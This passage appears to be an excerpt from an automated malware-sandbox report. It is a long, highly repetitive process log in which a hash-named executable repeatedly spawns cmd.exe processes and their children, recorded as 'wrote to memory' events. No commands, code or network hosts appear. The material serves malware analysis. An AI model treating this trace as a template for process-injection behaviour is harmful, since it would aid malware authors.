1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 528 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 528 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 528 PID 1960 wrote to memory of 1412 1960 cmd.exe 530 PID 1960 wrote to memory of 1412 1960 cmd.exe 530 PID 1960 wrote to memory of 1412 1960 cmd.exe 530 PID 1960 wrote to memory of 1412 1960 cmd.exe 530 PID 1960 wrote to memory of 932 1960 cmd.exe 531 PID 1960 wrote to memory of 932 1960 cmd.exe 531 PID 1960 wrote to memory of 932 1960 cmd.exe 531 PID 1960 wrote to memory of 932 1960 cmd.exe 531 PID 1960 wrote to memory of 216 1960 cmd.exe 532 PID 1960 wrote to memory of 216 1960 cmd.exe 532 PID 1960 wrote to memory of 216 1960 cmd.exe 532 PID 1960 wrote to memory of 216 1960 cmd.exe 532 PID 216 wrote to memory of 236 216 cmd.exe 533 PID 216 wrote to memory of 236 216 cmd.exe 533 PID 216 wrote to memory of 236 216 cmd.exe 533 PID 216 wrote to memory of 236 216 cmd.exe 533 PID 1960 wrote to memory of 1840 1960 cmd.exe 534 PID 1960 wrote to memory of 1840 1960 cmd.exe 534 PID 1960 wrote to memory of 1840 1960 cmd.exe 534 PID 1960 wrote to memory of 1840 1960 cmd.exe 534 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 535 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 535 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 535 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 535 PID 1752 wrote to memory of 208 1752 cmd.exe 537 PID 1752 wrote to memory of 208 1752 cmd.exe 537 PID 1752 wrote to memory of 208 1752 cmd.exe 537 PID 1752 wrote to memory of 208 1752 cmd.exe 537 PID 1752 wrote to memory of 1888 1752 cmd.exe 538 PID 1752 wrote to memory of 1888 1752 cmd.exe 538 PID 1752 wrote to memory of 1888 1752 cmd.exe 538 PID 1752 wrote to memory of 1888 1752 cmd.exe 538 PID 1752 wrote to memory of 1876 1752 cmd.exe 539 PID 1752 wrote to memory of 1876 1752 cmd.exe 539 PID 1752 wrote to memory of 1876 1752 cmd.exe 539 PID 1752 wrote to memory of 1876 1752 cmd.exe 539 PID 1876 wrote to memory of 548 1876 cmd.exe 540 PID 1876 wrote to memory of 548 1876 cmd.exe 540 PID 1876 wrote to memory of 548 1876 cmd.exe 540 PID 1876 wrote to memory of 548 1876 cmd.exe 540 PID 1752 wrote to memory of 1912 1752 cmd.exe 541 PID 1752 wrote to memory of 1912 1752 cmd.exe 541 PID 1752 wrote to memory of 1912 1752 cmd.exe 541 PID 1752 wrote to memory of 1912 1752 cmd.exe 541 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 542 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 542 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 542 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 542 PID 940 wrote to memory of 1896 940 cmd.exe 544 PID 940 wrote to memory of 1896 940 cmd.exe 544 PID 940 wrote to memory of 1896 940 cmd.exe 544 PID 940 wrote to memory of 1896 940 cmd.exe 544 PID 940 wrote to memory of 1416 940 cmd.exe 545 PID 940 wrote to memory of 1416 940 cmd.exe 545 PID 940 wrote to memory of 1416 940 cmd.exe 545 PID 940 wrote to memory of 1416 940 cmd.exe 545 PID 940 wrote to memory of 1788 940 cmd.exe 546 PID 940 wrote to memory of 1788 940 cmd.exe 546 PID 940 wrote to memory of 1788 940 cmd.exe 546 PID 940 wrote to memory of 1788 940 cmd.exe 546 PID 1788 wrote to memory of 1860 1788 cmd.exe 547 PID 1788 wrote to memory of 1860 1788 cmd.exe 547 PID 1788 wrote to memory of 1860 1788 cmd.exe 547 PID 1788 wrote to memory of 1860 1788 cmd.exe 547 PID 940 wrote to memory of 756 940 cmd.exe 548 PID 940 wrote to memory of 756 940 cmd.exe 548 PID 940 wrote to memory of 756 940 cmd.exe 548 PID 940 wrote to memory of 756 940 cmd.exe 548 PID 1116 wrote to memory of 1512 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 549 PID 1116 wrote to memory of 1512 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 549 PID 1116 wrote to memory of 1512 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 549 PID 1116 wrote to memory of 1512 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 549 PID 1512 wrote to memory of 932 1512 cmd.exe 551 PID 1512 wrote to memory of 932 1512 cmd.exe 551 PID 1512 wrote to memory of 932 1512 cmd.exe 551 PID 1512 wrote to memory of 932 1512 cmd.exe 551 PID 1512 wrote to memory of 292 1512 cmd.exe 552 PID 1512 wrote to memory of 292 1512 cmd.exe 552 PID 1512 wrote to memory of 292 1512 cmd.exe 552 PID 1512 wrote to memory of 292 1512 cmd.exe 552 PID 1512 wrote to memory of 1128 1512 cmd.exe 553 PID 1512 wrote to memory of 1128 1512 cmd.exe 553 PID 1512 wrote to memory of 1128 1512 cmd.exe 553 PID 1512 wrote to memory of 1128 1512 cmd.exe 553 PID 1128 wrote to memory of 1892 1128 cmd.exe 554 PID 1128 wrote to memory of 1892 1128 cmd.exe 554 PID 1128 wrote to memory of 1892 1128 cmd.exe 554 PID 1128 wrote to memory of 1892 1128 cmd.exe 554 PID 1512 wrote to memory of 1080 1512 cmd.exe 555 PID 1512 wrote to memory of 1080 1512 cmd.exe 555 PID 1512 wrote to memory of 1080 1512 cmd.exe 555 PID 1512 wrote to memory of 1080 1512 cmd.exe 555 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 556 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 556 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 556 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 556 PID 1772 wrote to memory of 1888 1772 cmd.exe 558 PID 1772 wrote to memory of 1888 1772 cmd.exe 558 PID 1772 wrote to memory of 1888 1772 cmd.exe 558 PID 1772 wrote to memory of 1888 1772 cmd.exe 558 PID 1772 wrote to memory of 280 1772 cmd.exe 559 PID 1772 wrote to memory of 280 1772 cmd.exe 559 PID 1772 wrote to memory of 280 1772 cmd.exe 559 PID 1772 wrote to memory of 280 1772 cmd.exe 559 PID 1772 wrote to memory of 972 1772 cmd.exe 560 PID 1772 wrote to memory of 972 1772 cmd.exe 560 PID 1772 wrote to memory of 972 1772 cmd.exe 560 PID 1772 wrote to memory of 972 1772 cmd.exe 560 PID 972 wrote to memory of 1608 972 cmd.exe 561 PID 972 wrote to memory of 1608 972 cmd.exe 561 PID 972 wrote to memory of 1608 972 cmd.exe 561 PID 972 wrote to memory of 1608 972 cmd.exe 561 PID 1772 wrote to memory of 964 1772 cmd.exe 562 PID 1772 wrote to memory of 964 1772 cmd.exe 562 PID 1772 wrote to memory of 964 1772 cmd.exe 562 PID 1772 wrote to memory of 964 1772 cmd.exe 562 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 563 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 563 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 563 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 563 PID 1096 wrote to memory of 1416 1096 cmd.exe 565 PID 1096 wrote to memory of 1416 1096 cmd.exe 565 PID 1096 wrote to memory of 1416 1096 cmd.exe 565 PID 1096 wrote to memory of 1416 1096 cmd.exe 565 PID 1096 wrote to memory of 848 1096 cmd.exe 566 PID 1096 wrote to memory of 848 1096 cmd.exe 566 PID 1096 wrote to memory of 848 1096 cmd.exe 566 PID 1096 wrote to memory of 848 1096 cmd.exe 566 PID 1096 wrote to memory of 1564 1096 cmd.exe 567 PID 1096 wrote to memory of 1564 1096 cmd.exe 567 PID 1096 wrote to memory of 1564 1096 cmd.exe 567 PID 1096 wrote to memory of 1564 1096 cmd.exe 567 PID 1564 wrote to memory of 228 1564 cmd.exe 568 PID 1564 wrote to memory of 228 1564 cmd.exe 568 PID 1564 wrote to memory of 228 1564 cmd.exe 568 PID 1564 wrote to memory of 228 1564 cmd.exe 568 PID 1096 wrote to memory of 1168 1096 cmd.exe 569 PID 1096 wrote to memory of 1168 1096 cmd.exe 569 PID 1096 wrote to memory of 1168 1096 cmd.exe 569 PID 1096 wrote to memory of 1168 1096 cmd.exe 569 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 570 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 570 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 570 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 570 PID 1412 wrote to memory of 292 1412 cmd.exe 572 PID 1412 wrote to memory of 292 1412 cmd.exe 572 PID 1412 wrote to memory of 292 1412 cmd.exe 572 PID 1412 wrote to memory of 292 1412 cmd.exe 572 PID 1412 wrote to memory of 1820 1412 cmd.exe 573 PID 1412 wrote to memory of 1820 1412 cmd.exe 573 PID 1412 wrote to memory of 1820 1412 cmd.exe 573 PID 1412 wrote to memory of 1820 1412 cmd.exe 573 PID 1412 wrote to memory of 216 1412 cmd.exe 574 PID 1412 wrote to memory of 216 1412 cmd.exe 574 PID 1412 wrote to memory of 216 1412 cmd.exe 574 PID 1412 wrote to memory of 216 1412 cmd.exe 574 PID 216 wrote to memory of 1808 216 cmd.exe 575 PID 216 wrote to memory of 1808 216 cmd.exe 575 PID 216 wrote to memory of 1808 216 cmd.exe 575 PID 216 wrote to memory of 1808 216 cmd.exe 575 PID 1412 wrote to memory of 1512 1412 cmd.exe 576 PID 1412 wrote to memory of 1512 1412 cmd.exe 576 PID 1412 wrote to memory of 1512 1412 cmd.exe 576 PID 1412 wrote to memory of 1512 1412 cmd.exe 576 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 577 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 577 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 577 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 577 PID 208 wrote to memory of 280 208 cmd.exe 579 PID 208 wrote to memory of 280 208 cmd.exe 579 PID 208 wrote to memory of 280 208 cmd.exe 579 PID 208 wrote to memory of 280 208 cmd.exe 579 PID 208 wrote to memory of 524 208 cmd.exe 580 PID 208 wrote to memory of 524 208 cmd.exe 580 PID 208 wrote to memory of 524 208 cmd.exe 580 PID 208 wrote to memory of 524 208 cmd.exe 580 PID 208 wrote to memory of 1876 208 cmd.exe 581 PID 208 wrote to memory of 1876 208 cmd.exe 581 PID 208 wrote to memory of 1876 208 cmd.exe 581 PID 208 wrote to memory of 1876 208 cmd.exe 581 PID 1876 wrote to memory of 204 1876 cmd.exe 582 PID 1876 wrote to memory of 204 1876 cmd.exe 582 PID 1876 wrote to memory of 204 1876 cmd.exe 582 PID 1876 wrote to memory of 204 1876 cmd.exe 582 PID 208 wrote to memory of 232 208 cmd.exe 583 PID 208 wrote to memory of 232 208 cmd.exe 583 PID 208 wrote to memory of 232 208 cmd.exe 583 PID 208 wrote to memory of 232 208 cmd.exe 583 PID 1116 wrote to memory of 1896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 584 PID 1116 wrote to memory of 1896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 584 PID 1116 wrote to memory of 1896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 584 PID 1116 wrote to memory of 1896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 584 PID 1896 wrote to memory of 848 1896 cmd.exe 586 PID 1896 wrote to memory of 848 1896 cmd.exe 586 PID 1896 wrote to memory of 848 1896 cmd.exe 586 PID 1896 wrote to memory of 848 1896 cmd.exe 586 PID 1896 wrote to memory of 1468 1896 cmd.exe 587 PID 1896 wrote to memory of 1468 1896 cmd.exe 587 PID 1896 wrote to memory of 1468 1896 cmd.exe 587 PID 1896 wrote to memory of 1468 1896 cmd.exe 587 PID 1896 wrote to memory of 1788 1896 cmd.exe 588 PID 1896 wrote to memory of 1788 1896 cmd.exe 588 PID 1896 wrote to memory of 1788 1896 cmd.exe 588 PID 1896 wrote to memory of 1788 1896 cmd.exe 588 PID 1788 wrote to memory of 1344 1788 cmd.exe 589 PID 1788 wrote to memory of 1344 1788 cmd.exe 589 PID 1788 wrote to memory of 1344 1788 cmd.exe 589 PID 1788 wrote to memory of 1344 1788 cmd.exe 589 PID 1896 wrote to memory of 1580 1896 cmd.exe 590 PID 1896 wrote to memory of 1580 1896 cmd.exe 590 PID 1896 wrote to memory of 1580 1896 cmd.exe 590 PID 1896 wrote to memory of 1580 1896 cmd.exe 590 PID 1116 wrote to memory of 932 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 591 PID 1116 wrote to memory of 932 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 591 PID 1116 wrote to memory of 932 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 591 PID 1116 wrote to memory of 932 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 591 PID 932 wrote to memory of 1820 932 cmd.exe 593 PID 932 wrote to memory of 1820 932 cmd.exe 593 PID 932 wrote to memory of 1820 932 cmd.exe 593 PID 932 wrote to memory of 1820 932 cmd.exe 593 PID 932 wrote to memory of 968 932 cmd.exe 594 PID 932 wrote to memory of 968 932 cmd.exe 594 PID 932 wrote to memory of 968 932 cmd.exe 594 PID 932 wrote to memory of 968 932 cmd.exe 594 PID 932 wrote to memory of 1128 932 cmd.exe 595 PID 932 wrote to memory of 1128 932 cmd.exe 595 PID 932 wrote to memory of 1128 932 cmd.exe 595 PID 932 wrote to memory of 1128 932 cmd.exe 595 PID 1128 wrote to memory of 900 1128 cmd.exe 596 PID 1128 wrote to memory of 900 1128 cmd.exe 596 PID 1128 wrote to memory of 900 1128 cmd.exe 596 PID 1128 wrote to memory of 900 1128 cmd.exe 596 PID 932 wrote to memory of 224 932 cmd.exe 597 PID 932 wrote to memory of 224 932 cmd.exe 597 PID 932 wrote to memory of 224 932 cmd.exe 597 PID 932 wrote to memory of 224 932 cmd.exe 597 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 598 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 598 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 598 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 598 PID 1888 wrote to memory of 524 1888 cmd.exe 600 PID 1888 wrote to memory of 524 1888 cmd.exe 600 PID 1888 wrote to memory of 524 1888 cmd.exe 600 PID 1888 wrote to memory of 524 1888 cmd.exe 600 PID 1888 wrote to memory of 380 1888 cmd.exe 601 PID 1888 wrote to memory of 380 1888 cmd.exe 601 PID 1888 wrote to memory of 380 1888 cmd.exe 601 PID 1888 wrote to memory of 380 1888 cmd.exe 601 PID 1888 wrote to memory of 972 1888 cmd.exe 602 PID 1888 wrote to memory of 972 1888 cmd.exe 602 PID 1888 wrote to memory of 972 1888 cmd.exe 602 PID 1888 wrote to memory of 972 1888 cmd.exe 602 PID 972 wrote to memory of 1372 972 cmd.exe 603 PID 972 wrote to memory of 1372 972 cmd.exe 603 PID 972 wrote to memory of 1372 972 cmd.exe 603 PID 972 wrote to memory of 1372 972 cmd.exe 603 PID 1888 wrote to memory of 208 1888 cmd.exe 604 PID 1888 wrote to memory of 208 1888 cmd.exe 604 PID 1888 wrote to memory of 208 1888 cmd.exe 604 PID 1888 wrote to memory of 208 1888 cmd.exe 604 PID 1116 wrote to memory of 1416 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 605 PID 1116 wrote to memory of 1416 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 605 PID 1116 wrote to memory of 1416 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 605 PID 1116 wrote to memory of 1416 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 605 PID 1416 wrote to memory of 1468 1416 cmd.exe 607 PID 1416 wrote to memory of 1468 1416 cmd.exe 607 PID 1416 wrote to memory of 1468 1416 cmd.exe 607 PID 1416 wrote to memory of 1468 1416 cmd.exe 607 PID 1416 wrote to memory of 944 1416 cmd.exe 608 PID 1416 wrote to memory of 944 1416 cmd.exe 608 PID 1416 wrote to memory of 944 1416 cmd.exe 608 PID 1416 wrote to memory of 944 1416 cmd.exe 608 PID 1416 wrote to memory of 1788 1416 cmd.exe 609 PID 1416 wrote to memory of 1788 1416 cmd.exe 609 PID 1416 wrote to memory of 1788 1416 cmd.exe 609 PID 1416 wrote to memory of 1788 1416 cmd.exe 609 PID 1788 wrote to memory of 1324 1788 cmd.exe 610 PID 1788 wrote to memory of 1324 1788 cmd.exe 610 PID 1788 wrote to memory of 1324 1788 cmd.exe 610 PID 1788 wrote to memory of 1324 1788 cmd.exe 610 PID 1416 wrote to memory of 1756 1416 cmd.exe 611 PID 1416 wrote to memory of 1756 1416 cmd.exe 611 PID 1416 wrote to memory of 1756 1416 cmd.exe 611 PID 1416 wrote to memory of 1756 1416 cmd.exe 611 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 612 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 612 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 612 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 612 PID 292 wrote to memory of 968 292 cmd.exe 614 PID 292 wrote to memory of 968 292 cmd.exe 614 PID 292 wrote to memory of 968 292 cmd.exe 614 PID 292 wrote to memory of 968 292 cmd.exe 614 PID 292 wrote to memory of 1816 292 cmd.exe 615 PID 292 wrote to memory of 1816 292 cmd.exe 615 PID 292 wrote to memory of 1816 292 cmd.exe 615 PID 292 wrote to memory of 1816 292 cmd.exe 615 PID 292 wrote to memory of 216 292 cmd.exe 616 PID 292 wrote to memory of 216 292 cmd.exe 616 PID 292 wrote to memory of 216 292 cmd.exe 616 PID 292 wrote to memory of 216 292 cmd.exe 616 PID 216 wrote to memory of 2016 216 cmd.exe 617 PID 216 wrote to memory of 2016 216 cmd.exe 617 PID 216 wrote to memory of 2016 216 cmd.exe 617 PID 216 wrote to memory of 2016 216 cmd.exe 617 PID 292 wrote to memory of 1840 292 cmd.exe 618 PID 292 wrote to memory of 1840 292 cmd.exe 618 PID 292 wrote to memory of 1840 292 cmd.exe 618 PID 292 wrote to memory of 1840 292 cmd.exe 618 PID 1116 wrote to memory of 280 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 619 PID 1116 wrote to memory of 280 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 619 PID 1116 wrote to memory of 280 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 619 PID 1116 wrote to memory of 280 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 619 PID 280 wrote to memory of 380 280 cmd.exe 621 PID 280 wrote to memory of 380 280 cmd.exe 621 PID 280 wrote to memory of 380 280 cmd.exe 621 PID 280 wrote to memory of 380 280 cmd.exe 621 PID 280 wrote to memory of 1952 280 cmd.exe 622 PID 280 wrote to memory of 1952 280 cmd.exe 622 PID 280 wrote to memory of 1952 280 cmd.exe 622 PID 280 wrote to memory of 1952 280 cmd.exe 622 PID 280 wrote to memory of 1876 280 cmd.exe 623 PID 280 wrote to memory of 1876 280 cmd.exe 623 PID 280 wrote to memory of 1876 280 cmd.exe 623 PID 280 wrote to memory of 1876 280 cmd.exe 623 PID 1876 wrote to memory of 300 1876 cmd.exe 624 PID 1876 wrote to memory of 300 1876 cmd.exe 624 PID 1876 wrote to memory of 300 1876 cmd.exe 624 PID 1876 wrote to memory of 300 1876 cmd.exe 624 PID 280 wrote to memory of 1108 280 cmd.exe 625 PID 280 wrote to memory of 1108 280 cmd.exe 625 PID 280 wrote to memory of 1108 280 cmd.exe 625 PID 280 wrote to memory of 1108 280 cmd.exe 625 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 626 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 626 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 626 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 626 PID 848 wrote to memory of 944 848 cmd.exe 628 PID 848 wrote to memory of 944 848 cmd.exe 628 PID 848 wrote to memory of 944 848 cmd.exe 628 PID 848 wrote to memory of 944 848 cmd.exe 628 PID 848 wrote to memory of 1860 848 cmd.exe 629 PID 848 wrote to memory of 1860 848 cmd.exe 629 PID 848 wrote to memory of 1860 848 cmd.exe 629 PID 848 wrote to memory of 1860 848 cmd.exe 629 PID 848 wrote to memory of 1908 848 cmd.exe 630 PID 848 wrote to memory of 1908 848 cmd.exe 630 PID 848 wrote to memory of 1908 848 cmd.exe 630 PID 848 wrote to memory of 1908 848 cmd.exe 630 PID 1908 wrote to memory of 1896 1908 cmd.exe 631 PID 1908 wrote to memory of 1896 1908 cmd.exe 631 PID 1908 wrote to memory of 1896 1908 cmd.exe 631 PID 1908 wrote to memory of 1896 1908 cmd.exe 631 PID 848 wrote to memory of 1376 848 cmd.exe 632 PID 848 wrote to memory of 1376 848 cmd.exe 632 PID 848 wrote to memory of 1376 848 cmd.exe 632 PID 848 wrote to memory of 1376 848 cmd.exe 632 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 633 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 633 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 633 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 633 PID 1820 wrote to memory of 1236 1820 cmd.exe 635 PID 1820 wrote to memory of 1236 1820 cmd.exe 635 PID 1820 wrote to memory of 1236 1820 cmd.exe 635 PID 1820 wrote to memory of 1236 1820 cmd.exe 635 PID 1820 wrote to memory of 224 1820 cmd.exe 636 PID 1820 wrote to memory of 224 1820 cmd.exe 636 PID 1820 wrote to memory of 224 1820 cmd.exe 636 PID 1820 wrote to memory of 224 1820 cmd.exe 636 PID 1820 wrote to memory of 1128 1820 cmd.exe 637 PID 1820 wrote to memory of 1128 1820 cmd.exe 637 PID 1820 wrote to memory of 1128 1820 cmd.exe 637 PID 1820 wrote to memory of 1128 1820 cmd.exe 637 PID 1128 wrote to memory of 468 1128 cmd.exe 638 PID 1128 wrote to memory of 468 1128 cmd.exe 638 PID 1128 wrote to memory of 468 1128 cmd.exe 638 PID 1128 wrote to memory of 468 1128 cmd.exe 638 PID 1820 wrote to memory of 296 1820 cmd.exe 639 PID 1820 wrote to memory of 296 1820 cmd.exe 639 PID 1820 wrote to memory of 296 1820 cmd.exe 639 PID 1820 wrote to memory of 296 1820 cmd.exe 639 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 640 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 640 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 640 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 640 PID 524 wrote to memory of 1952 524 cmd.exe 642 PID 524 wrote to memory of 1952 524 cmd.exe 642 PID 524 wrote to memory of 1952 524 cmd.exe 642 PID 524 wrote to memory of 1952 524 cmd.exe 642 PID 524 wrote to memory of 1800 524 cmd.exe 643 PID 524 wrote to memory of 1800 524 cmd.exe 643 PID 524 wrote to memory of 1800 524 cmd.exe 643 PID 524 wrote to memory of 1800 524 cmd.exe 643 PID 524 wrote to memory of 1876 524 cmd.exe 644 PID 524 wrote to memory of 1876 524 cmd.exe 644 PID 524 wrote to memory of 1876 524 cmd.exe 644 PID 524 wrote to memory of 1876 524 cmd.exe 644 PID 1876 wrote to memory of 1888 1876 cmd.exe 645 PID 1876 wrote to memory of 1888 1876 cmd.exe 645 PID 1876 wrote to memory of 1888 1876 cmd.exe 645 PID 1876 wrote to memory of 1888 1876 cmd.exe 645 PID 524 wrote to memory of 204 524 cmd.exe 646 PID 524 wrote to memory of 204 524 cmd.exe 646 PID 524 wrote to memory of 204 524 cmd.exe 646 PID 524 wrote to memory of 204 524 cmd.exe 646 PID 1116 wrote to memory of 916 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 647 PID 1116 wrote to memory of 916 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 647 PID 1116 wrote to memory of 916 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 647 PID 1116 wrote to memory of 916 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 647 PID 916 wrote to memory of 484 916 cmd.exe 649 PID 916 wrote to memory of 484 916 cmd.exe 649 PID 916 wrote to memory of 484 916 cmd.exe 649 PID 916 wrote to memory of 484 916 cmd.exe 649 PID 916 wrote to memory of 928 916 cmd.exe 650 PID 916 wrote to memory of 928 916 cmd.exe 650 PID 916 wrote to memory of 928 916 cmd.exe 650 PID 916 wrote to memory of 928 916 cmd.exe 650 PID 916 wrote to memory of 1904 916 cmd.exe 651 PID 916 wrote to memory of 1904 916 cmd.exe 651 